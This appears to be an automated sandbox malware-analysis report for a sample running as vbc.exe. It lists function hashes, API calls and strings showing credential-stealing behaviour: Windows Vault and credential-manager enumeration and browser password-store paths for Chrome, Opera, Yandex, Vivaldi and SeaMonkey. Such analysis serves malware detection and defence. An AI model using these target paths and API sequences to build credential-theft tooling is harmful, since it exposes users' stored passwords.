Instruction ID: 4955d969df5132221f8435577efc794823c6d7f81185ad14a63030d949a83376
Opcode Fuzzy Hash: 72484f2107ba8316333bf3dda80dee1bd6df260d4424d559e6fc14eb3faf8fde
Instruction Fuzzy Hash: AC1184724097C49FE713CB15CC84B62BFF8EB47664F0885DAED858F653D2695804CB62

Uniqueness

Uniqueness Score: -1.00%

Function 012009FB, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4860f3191413fab8896b064f89b04e70478aadc8d51495aa6e2afc3d78025f
Instruction ID: fee908b9921f16916232f7151146145e036a94750c0e3d1572dc251edf522887
Opcode Fuzzy Hash: 6d4860f3191413fab8896b064f89b04e70478aadc8d51495aa6e2afc3d78025f
Instruction Fuzzy Hash: E61187724097C49FE7138B15CD84B61BFF4EF47660F08859AED858F653C3695804CB62

Uniqueness

Uniqueness Score: -1.00%

Function 012009CB, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2778405269583f641ff5ea14b7e72a790d650fa2e3cbbec90ed8e0e5384bc68a
Instruction ID: 98f37c3cad791ef6a5dfa6f65ee20b068caba1d2e58c54d76fd32ae5d05a3b83
Opcode Fuzzy Hash: 2778405269583f641ff5ea14b7e72a790d650fa2e3cbbec90ed8e0e5384bc68a
Instruction Fuzzy Hash: 8D1184724093C49FE7138B15CC84762BFF8EB43660F09859AED898F693C3695804CB62

Uniqueness

Uniqueness Score: -1.00%

Function 01200B8C, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b27a78315170d367da36979bc2e754fad481cfa1faae779b66bc0acd14b88999
Instruction ID: 57d6205c44191bec5a2c13649cf6eeabf54df4c8493caa5f5adc3a2043b147ea
Opcode Fuzzy Hash: b27a78315170d367da36979bc2e754fad481cfa1faae779b66bc0acd14b88999
Instruction Fuzzy Hash: 58110630258745DFE316CB14C984B26BBD1AB89708F24C69CFA490B683C77BD803CB55

Uniqueness

Uniqueness Score: -1.00%

Function 014EB0D4, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.603541222.00000000014E7000.00000040.00000001.sdmp, Offset: 014E7000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa87e6be0e652645c44551490c9853bb720fa8d358fca288044d2d8c49a7f97f
Instruction ID: e0c9ccb783e4d274d19ba738c4f027580bf437bda0ba1688a2f09de86ed681a3
Opcode Fuzzy Hash: aa87e6be0e652645c44551490c9853bb720fa8d358fca288044d2d8c49a7f97f
Instruction Fuzzy Hash: 1511FEB5508301AFD350CF49DC81E57FBE4EB98660F04891EFD9997311D371E9048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 012005AF, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c55cff0858772222dc166e9a98761c48b0d5dec8cd024bbc6861f14224bf7c39
Instruction ID: ec6cab2703420d62c268114c3328000dd07bbe4552066eb06470c38714e95b3e
Opcode Fuzzy Hash: c55cff0858772222dc166e9a98761c48b0d5dec8cd024bbc6861f14224bf7c39
Instruction Fuzzy Hash: 6A01DD725097809FD713CB16EC41862BFB8EF46660748C49FEC498B652D275A505CB62

Uniqueness

Uniqueness Score: -1.00%

Function 01200808, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f254674419a042b2f7669d83ed840758cbc955c53d0f341cf374dd3404e0fb59
Instruction ID: 555d59652d648fd1cc634e614fef27f8e9abfb373e5d945a89c86c7a003eab6b
Opcode Fuzzy Hash: f254674419a042b2f7669d83ed840758cbc955c53d0f341cf374dd3404e0fb59
Instruction Fuzzy Hash: 2B019276500784AFE722CF09DC84B62FFE8FB85660F08856DFE494B642C379A504CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01200936, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cef5cbe89775ed6aa5aca6855761e06d93ed7ae2c1f5f7681bec4d5327d879e
Instruction ID: 0bf244bc1f0b9a973850654518195c85d3dbecc9039900952d4ef67e15158b73
Opcode Fuzzy Hash: 8cef5cbe89775ed6aa5aca6855761e06d93ed7ae2c1f5f7681bec4d5327d879e
Instruction Fuzzy Hash: 1E01F131524788DFF712CF19C980726FFD4EB40A60F08856AED4A4B783C3B99404CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0120081E, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67aa81f8a1d5e5c45e5ea7e52b325b93c01d5056bc82724599263191f4d1cc14
Instruction ID: 064bea3eb4b49d6da0c8a231a3e0c7d576c912b455718f94b376521c752b93a0
Opcode Fuzzy Hash: 67aa81f8a1d5e5c45e5ea7e52b325b93c01d5056bc82724599263191f4d1cc14
Instruction Fuzzy Hash: 1701F131914780DFE712DF19D8C4726FFD4FB44660F08856AED0A4BA43C3B89504CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01200B78, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61919ef53f62821c63d5adc87a3de322bc802cf173e4a1ef01d13e076a54b8fb
Instruction ID: e653471ae80dabe97005c444984e63a3671ac90e3438234048fbc0149e6dcee5
Opcode Fuzzy Hash: 61919ef53f62821c63d5adc87a3de322bc802cf173e4a1ef01d13e076a54b8fb
Instruction Fuzzy Hash: 77119E311083858FD707CB10C980B55BBB1EB86308F28C6EEE9894B6A3C33AD803CB41

Uniqueness

Uniqueness Score: -1.00%

Function 012005CF, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd21ae8183dde7daf33412da0b15df338d39c80872607e9cea15c4d862d65be9
Instruction ID: b4deed223a7ec640ca69943f74b28914e83426486343a74b2b016831d1db4089
Opcode Fuzzy Hash: bd21ae8183dde7daf33412da0b15df338d39c80872607e9cea15c4d862d65be9
Instruction Fuzzy Hash: 76012B715097806FD7138F06DC51862FFB8DF86260708C0AFEC498B603D225A908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 012005BF, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6876eda6a618974a287f878394f0702f5bcd746dbd101ce964b589b8832124e
Instruction ID: 8f01334388a5fcae9f29407f292ff0075bfb0f976bbcc9783989b7bcb34027cd
Opcode Fuzzy Hash: f6876eda6a618974a287f878394f0702f5bcd746dbd101ce964b589b8832124e
Instruction Fuzzy Hash: 0BF0C876544750AFDB12CF0AEC81952FBA8EB85670B08C46EFD4D87701E275B504CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01200C48, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction ID: 7556d5f4668bfff81f50d471ec2394f038ed9e99cd8ef81a36b750bc28448c07
Opcode Fuzzy Hash: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction Fuzzy Hash: 62F0FB35158645DFC306CF04D980B15FBA2EB89718F24C6A9E9490B653C7379813DA85

Uniqueness

Uniqueness Score: -1.00%

Function 012005F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.602786933.0000000001200000.00000040.00000040.sdmp, Offset: 01200000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 110240458c0595df1e07bf72fdf62abeea15759ea27e6d4c3ba17896a876819a
Instruction ID: b88648bdedfb033609ba09a4198377ed5c85861a0e65b59643ad52e86a5af716
Opcode Fuzzy Hash: 110240458c0595df1e07bf72fdf62abeea15759ea27e6d4c3ba17896a876819a
Instruction Fuzzy Hash: 13E06D76A006008B9650CF0AEC81452FB94EB84630B48C06FDC0D8B700E176B6048AA5

Uniqueness

Uniqueness Score: -1.00%

Function 014EB123, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.603541222.00000000014E7000.00000040.00000001.sdmp, Offset: 014E7000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 110fd3fb2c48119a1a60a5063c68a3d76c6df4451b56db42241ba6b8c0356eef
Instruction ID: 720ac8441fe122fde3cb05ee3c61e2c53fd72388a63ecf874bc8b2de76bdf755
Opcode Fuzzy Hash: 110fd3fb2c48119a1a60a5063c68a3d76c6df4451b56db42241ba6b8c0356eef
Instruction Fuzzy Hash: 3CE0D8769403046BD2108F069C82B53FB58EB50A30F04C557EE0D5B301D1B2B61489F1

Uniqueness

Uniqueness Score: -1.00%

Function 08291FB7, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.610014835.0000000008290000.00000040.00000001.sdmp, Offset: 08290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5e58444260a8653ab80e3cfafea971cf0b0b5001afa890d6150592ce9b697f9
Instruction ID: b21c478152ed82dac11ed84d46e96c0576cbd963a6a96ef07f838a17e3cb99af
Opcode Fuzzy Hash: d5e58444260a8653ab80e3cfafea971cf0b0b5001afa890d6150592ce9b697f9
Instruction Fuzzy Hash: D6E0D8B29403006BD2108F06AC82B63FF58EB50A30F44C567ED0C5B301D1B2B61489F1

Uniqueness

Uniqueness Score: -1.00%

Function 08291863, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.610014835.0000000008290000.00000040.00000001.sdmp, Offset: 08290000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21f5c508d213100b0bc48a2514a4a932be39988739249f9d40409f8f2324a775
Instruction ID: 6ea70e77d3c1709a38c34161b18787fc554b5a4282e8f6bd1722ce4426686278
Opcode Fuzzy Hash: 21f5c508d213100b0bc48a2514a4a932be39988739249f9d40409f8f2324a775
Instruction Fuzzy Hash: AFE092729003006BD2108A06AC82B63FB58EB40A30F548456EE0D5B301D1B2A61489A1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 6576 Parent PID: 6476 vbc.exeCOMMON

Executed Functions

Function 0040978A, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004097B2

Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 004097D9

Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542

Part of subcall function 004118EA: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00409807,?,000000FF,00000000,00000104), ref: 004118FD
Part of subcall function 004118EA: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00411914
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00411926
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00411938
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041194A
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0041195C
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtQueryObject), ref: 0041196E
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00411980
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtResumeProcess), ref: 00411992

NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040981A
FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00409843
GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040984E
_wcsicmp.MSVCRT ref: 004098B7
_wcsicmp.MSVCRT ref: 004098CA
_wcsicmp.MSVCRT ref: 004098DD
OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 004098F1
GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 00409937
DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 00409946
memset.MSVCRT ref: 00409964
CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 00409997
_wcsicmp.MSVCRT ref: 004099B7
CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 004099F7

Strings

taskhostex.exe, xrefs: 004098D5
dllhost.exe, xrefs: 004098AE
taskhost.exe, xrefs: 004098C2

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
String ID: dllhost.exe$taskhost.exe$taskhostex.exe
API String ID: 594330280-3398334509
Opcode ID: 744fbf75455b6098578e480c8635837c5c89e79d09ece7b140be473bd29f90d8
Instruction ID: 2b0fa152ef01bef0fcdaafddb1ab82311fd8af30ec04a4c20003f9f52c8fe1fb
Opcode Fuzzy Hash: 744fbf75455b6098578e480c8635837c5c89e79d09ece7b140be473bd29f90d8
Instruction Fuzzy Hash: 7B815E71900219EFEF10EF95C885AAEBBB5FF44305F20806EF905B6292D7399E41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004443B0, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000), ref: 004443BD
GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004443D2
GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004443DF
GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 004443EC
GetProcAddress.KERNEL32(00000000,VaultFree), ref: 004443F9
GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 00444406
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00444414
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044441D

Strings

vaultcli.dll, xrefs: 004443B8
VaultEnumerateItems, xrefs: 004443E1
VaultGetInformation, xrefs: 004443FB
VaultFree, xrefs: 004443EE
VaultCloseVault, xrefs: 004443D4
VaultOpenVault, xrefs: 004443C9
VaultGetItem, xrefs: 00444408, 0044440D, 00444416

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2238633743-2107673790
Opcode ID: 78ba4d5693d53eadcf9c8744485d997ab560c1e320cc44334ae31523dad5f6ee
Instruction ID: bae3ddfd5a2cf1e2657d78bbfe85c411ed61fca9aeaa9a4901361c1bc58423a9
Opcode Fuzzy Hash: 78ba4d5693d53eadcf9c8744485d997ab560c1e320cc44334ae31523dad5f6ee
Instruction Fuzzy Hash: 5201E874940B44EFEB306F71CD09E07BAE4EF94B117118D2EE49A92A10D778E818CE54

Uniqueness

Uniqueness Score: -1.00%

Function 00413424, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413442
memset.MSVCRT ref: 00413457
Process32FirstW.KERNEL32(?,?), ref: 00413473
OpenProcess.KERNEL32(00000410,00000000,?,00000000,?,?), ref: 004134B8
memset.MSVCRT ref: 004134DF
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413514
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0041352E
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00413580
free.MSVCRT(-00000028), ref: 00413599
Process32NextW.KERNEL32(?,0000022C), ref: 004135E2
CloseHandle.KERNEL32(?,?,0000022C), ref: 004135F2

Strings

QueryFullProcessImageNameW, xrefs: 0041351E
kernel32.dll, xrefs: 0041350F

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 1344430650-1740548384
Opcode ID: ed6fa7fbe2363a651f29f393370116b4659e51fbe7daf5e0a77eaee9eb31a363
Instruction ID: 336025cd3e57628a03d53de68a5eb917573850932ab3a304507e713d781e6372
Opcode Fuzzy Hash: ed6fa7fbe2363a651f29f393370116b4659e51fbe7daf5e0a77eaee9eb31a363
Instruction Fuzzy Hash: 3E518CB2C00118ABDB10DFA5DC84ADEF7B9AF95301F1040ABE508A3251DB799B84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040938F, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000103,0000038B,00000000,?,00412880,*.*,?), ref: 004093A5
FindNextFileW.KERNELBASE(000000FF,0000038B,00000000,?,00412880,*.*,?), ref: 004093C3
wcslen.MSVCRT ref: 004093F3
wcslen.MSVCRT ref: 004093FB

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindwcslen$FirstNext
String ID:
API String ID: 2163959949-0
Opcode ID: bbfa88675e90f7cab1951949309c9f409910220031eaa870910243319b313dcd
Instruction ID: fe44496fd245f22b3294f1be8fcbf5b62ffed3b59158e7af3f9261faba672c79
Opcode Fuzzy Hash: bbfa88675e90f7cab1951949309c9f409910220031eaa870910243319b313dcd
Instruction Fuzzy Hash: CA11E97240A7019FD7149B64E884A9B73DCEF45324F204A3FF459E31C1EB78AC008718

Uniqueness

Uniqueness Score: -1.00%

Function 004141E0, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 004141ED
SizeofResource.KERNEL32(?,00000000), ref: 004141FE
LoadResource.KERNEL32(?,00000000), ref: 0041420E
LockResource.KERNEL32(00000000), ref: 00414219

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: ec51cf45041cf25647cccbc885ed45c86f25aef72003178a0d679bc8b0aad2a7
Instruction ID: 4db2b1a63d72691fd362fce079069d1f86e41d88e51d490a39d61a138898f27d
Opcode Fuzzy Hash: ec51cf45041cf25647cccbc885ed45c86f25aef72003178a0d679bc8b0aad2a7
Instruction Fuzzy Hash: A8019636A002156B8F155FA5DD4999F7FAAFFC67D0708803AF915CA221DB70C882C688

Uniqueness

Uniqueness Score: -1.00%

Function 00418073, Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00417F9B: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00417FC7
Part of subcall function 00417F9B: malloc.MSVCRT ref: 00417FD2
Part of subcall function 00417F9B: free.MSVCRT(?), ref: 00417FE2

Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9

GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004180ED
GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00418115
free.MSVCRT(00000000,?,00000000,?,00000000), ref: 0041811E

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
String ID:
API String ID: 1355100292-0
Opcode ID: 8e76693c67f0b4aa2a9f0ce93b5e4d32a4f514a6f71b86ff027121c958f9ef7a
Instruction ID: 44f72dfadcd4ed0e6b0cb1466d7c09a20078aec04da8d2fdb22fffa922359726
Opcode Fuzzy Hash: 8e76693c67f0b4aa2a9f0ce93b5e4d32a4f514a6f71b86ff027121c958f9ef7a
Instruction Fuzzy Hash: 8A215076800118BEEB21ABA4CC449EF7BBCAF09344F1540ABE641D7211EB784EC587A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041829C, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004182A7
GetSystemInfo.KERNELBASE(00453D60,?,00000000,00442D20,?,?,?), ref: 004182B0

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoSystemmemset
String ID:
API String ID: 3558857096-0
Opcode ID: e09057acdafeef912d39132da5cb39305370b204b8372ac2ca77995ca7410ec3
Instruction ID: 3c0be6fe3b5a6ffc89f5b68e380a6edd79d3b36df5ca7f17532ee32b6b8f0e73
Opcode Fuzzy Hash: e09057acdafeef912d39132da5cb39305370b204b8372ac2ca77995ca7410ec3
Instruction Fuzzy Hash: 86E09235E01A242BE7117F767C07BDB26948F8A38AF04407BF904DA253EA6CCD414ADE

Uniqueness

Uniqueness Score: -1.00%

Function 00411E4C, Relevance: 104.0, APIs: 43, Strings: 16, Instructions: 752COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411EC2
wcsrchr.MSVCRT ref: 00411EDB
memset.MSVCRT ref: 0041202F

Part of subcall function 0040A94C: _wcslwr.MSVCRT ref: 0040AA14
Part of subcall function 0040A94C: wcslen.MSVCRT ref: 0040AA29

Part of subcall function 0040956D: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 004095A6
Part of subcall function 0040956D: wcslen.MSVCRT ref: 004095CC
Part of subcall function 0040956D: wcsncmp.MSVCRT(?,?,00000020,?,00000000,?), ref: 00409602
Part of subcall function 0040956D: memset.MSVCRT ref: 00409679
Part of subcall function 0040956D: memcpy.MSVCRT ref: 0040969A

Part of subcall function 0040ADD0: LoadLibraryW.KERNELBASE(pstorec.dll), ref: 0040ADE1
Part of subcall function 0040ADD0: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040ADF4

Part of subcall function 004444B7: memcmp.MSVCRT ref: 0044455D

Part of subcall function 00410F47: memset.MSVCRT ref: 00410F6A
Part of subcall function 00410F47: memset.MSVCRT ref: 00410F7F
Part of subcall function 00410F47: memset.MSVCRT ref: 00410F94
Part of subcall function 00410F47: memset.MSVCRT ref: 00410FA9
Part of subcall function 00410F47: memset.MSVCRT ref: 00410FBE
Part of subcall function 00410F47: wcslen.MSVCRT ref: 00410FE4
Part of subcall function 00410F47: wcslen.MSVCRT ref: 00410FF5
Part of subcall function 00410F47: wcslen.MSVCRT ref: 0041102D
Part of subcall function 00410F47: wcslen.MSVCRT ref: 0041103B
Part of subcall function 00410F47: wcslen.MSVCRT ref: 00411074
Part of subcall function 00410F47: wcslen.MSVCRT ref: 00411082

memset.MSVCRT ref: 0041204B
memset.MSVCRT ref: 00412061
memset.MSVCRT ref: 0041207D
wcslen.MSVCRT ref: 004120C4
wcslen.MSVCRT ref: 004120D1
ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,?,00000104), ref: 004121C5
memset.MSVCRT ref: 0041217E

Part of subcall function 00407991: memset.MSVCRT ref: 004079D1
Part of subcall function 00407991: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 004079EA
Part of subcall function 00407991: memset.MSVCRT ref: 00407A23
Part of subcall function 00407991: memset.MSVCRT ref: 00407A3B
Part of subcall function 00407991: memset.MSVCRT ref: 00407A53
Part of subcall function 00407991: memset.MSVCRT ref: 00407A6B
Part of subcall function 00407991: memset.MSVCRT ref: 00407A83
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407A8E
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407A9C
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407ACB

memset.MSVCRT ref: 00412241
memset.MSVCRT ref: 0041225B
wcslen.MSVCRT ref: 00412275
wcslen.MSVCRT ref: 00412283
memset.MSVCRT ref: 004122FD
memset.MSVCRT ref: 00412317
wcslen.MSVCRT ref: 00412331
wcslen.MSVCRT ref: 0041233F
memset.MSVCRT ref: 004123C2
memset.MSVCRT ref: 004123E0
memset.MSVCRT ref: 004123FE
memset.MSVCRT ref: 00412573

Part of subcall function 00407991: wcslen.MSVCRT ref: 00407AD9
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B08
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B16
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B45
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B53
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B82
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B90
Part of subcall function 00407991: SetCurrentDirectoryW.KERNEL32(?), ref: 00407CAB

wcslen.MSVCRT ref: 0041245B
wcslen.MSVCRT ref: 00412469
wcslen.MSVCRT ref: 004124AF
wcslen.MSVCRT ref: 004124BD
wcslen.MSVCRT ref: 00412503
wcslen.MSVCRT ref: 00412511
_wcsicmp.MSVCRT ref: 004125DA

Part of subcall function 004442F9: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,0041274B,?,?), ref: 00444310
Part of subcall function 004442F9: ??2@YAPAXI@Z.MSVCRT ref: 00444324
Part of subcall function 004442F9: memset.MSVCRT ref: 00444333
Part of subcall function 004442F9: ??3@YAXPAX@Z.MSVCRT ref: 00444356
Part of subcall function 004442F9: CloseHandle.KERNEL32(00000000), ref: 0044435D

Strings

Login Data, xrefs: 004125D4
Yandex\YandexBrowser\User Data\Default\Login Data, xrefs: 0041227C, 0041229B
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe, xrefs: 0041218B
Data\Profile, xrefs: 004120BF, 004120E6
Opera Software\Opera Stable\Login Data, xrefs: 004128A2, 004128BE
Chromium\User Data, xrefs: 0041250A, 00412526
Vivaldi\User Data\Default\Login Data, xrefs: 00412338, 00412357
%programfiles%\Sea Monkey, xrefs: 004121C0
wand.dat, xrefs: 00412811, 00412830
Opera\Opera\wand.dat, xrefs: 0041266F, 0041268B
*.*, xrefs: 004127C4
Path, xrefs: 00412186
Google\Chrome SxS\User Data, xrefs: 004124B6, 004124D2
Google\Chrome\User Data, xrefs: 00412462, 0041247E
Opera\Opera7\profile\wand.dat, xrefs: 004126D9, 004126F5
Opera, xrefs: 0041277A, 00412796

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memset$??2@??3@AddressByteCharCloseCredCurrentDirectoryEnumerateEnvironmentExpandFileHandleLibraryLoadMultiProcSizeStringsWide_wcsicmp_wcslwrmemcmpmemcpywcsncmpwcsrchr
String ID: %programfiles%\Sea Monkey$*.*$Chromium\User Data$Data\Profile$Google\Chrome SxS\User Data$Google\Chrome\User Data$Login Data$Opera$Opera Software\Opera Stable\Login Data$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$Vivaldi\User Data\Default\Login Data$Yandex\YandexBrowser\User Data\Default\Login Data$wand.dat
API String ID: 2195781745-1743926287
Opcode ID: 0dfe16fee904680cb0bfa71703a20f26bea0553467f296cf69df4e43642452a8
